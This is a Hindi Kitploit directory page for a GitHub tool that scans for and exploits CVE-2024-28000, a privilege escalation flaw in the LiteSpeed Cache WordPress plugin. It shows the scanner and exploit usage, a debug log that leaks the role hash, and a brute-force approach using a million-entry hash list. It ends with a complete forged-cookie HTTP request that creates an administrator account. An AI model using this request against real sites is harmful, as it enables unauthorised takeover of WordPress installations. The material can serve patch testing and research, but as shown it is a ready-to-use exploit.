Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-28000 — CVE-2024-28000 LiteSpeed Cache विशेषाधिकार वृद्धि स्कैन और एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/ssssuperx/cve-2024-28000
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षा
GitHubssssuperx/cve-2024-28000

CVE-2024-28000

CVE-2024-28000 LiteSpeed Cache विशेषाधिकार वृद्धि स्कैन और एक्सप्लॉइट

रिपॉजिटरी देखें
122 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

LiteSpeed कैश विशेषाधिकार वृद्धि एक्सप्लॉइट

CVE-2024-28000_Scan.py

  • यह स्क्रिप्ट पहले संस्करण की पहचान करती है, यह निर्धारित करती है कि क्या यह कमजोर संस्करण है, फिर लॉग फ़ाइल की उपस्थिति की पुष्टि करने का प्रयास करती है। यदि मौजूद है, तो यह पैकेट भेजने के बाद फिर से लॉग फ़ाइल का अनुरोध करके हैश लीक की खोज करने का प्रयास करती है। यदि LiteSpeed डीबग सक्षम है, तो सही हैश लीक हो सकता है।
root@kitploit:~
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808

उदाहरण:

root@kitploit:~
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init

यदि LiteSpeed डीबग सक्षम है, तो उपरोक्त जैसा लॉग दिखाई दे सकता है, जहाँ pkHrfD सही हैश है।

CVE-2024-28000_Exploit.py

  • परीक्षण से पता चला है कि Python और PHP द्वारा उत्पन्न हैश में अंतर है, इसलिए हैश सूची Python द्वारा अनुकरण नहीं की जा सकती। Hash_list.txt फ़ाइल PHP द्वारा उत्पन्न 1000000 हैश है, इसलिए सैद्धांतिक रूप से अधिकतम 1000000 बार पुनरावृत्त करके सही हैश प्राप्त किया जा सकता है।
root@kitploit:~
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
  • -d पैरामीटर हैश सूची है, -u URL है, -t थ्रेड संख्या है। थ्रेड की संख्या बहुत अधिक न रखें।

परीक्षण

  • टार्गेट रेंज परीक्षण में हैश को सफलतापूर्वक पुनरावृत्त किया जा सकता है, और पाँच बार पुनर्स्थापित करने के बाद भी यह पुष्टि हुई है कि हैश उत्पन्न हैश सूची में है, लेकिन कई पहलुओं से वास्तविक उपयोग की सफलता दर कम है।
  • सही हैश मिलने के बाद, नीचे दिए गए पैकेट का उपयोग करके एक व्यवस्थापक उपयोगकर्ता जोड़ा जा सकता है।
root@kitploit:~
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=正确Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "[email protected]", "roles": ["administrator"]}
टूल डाउनलोड करें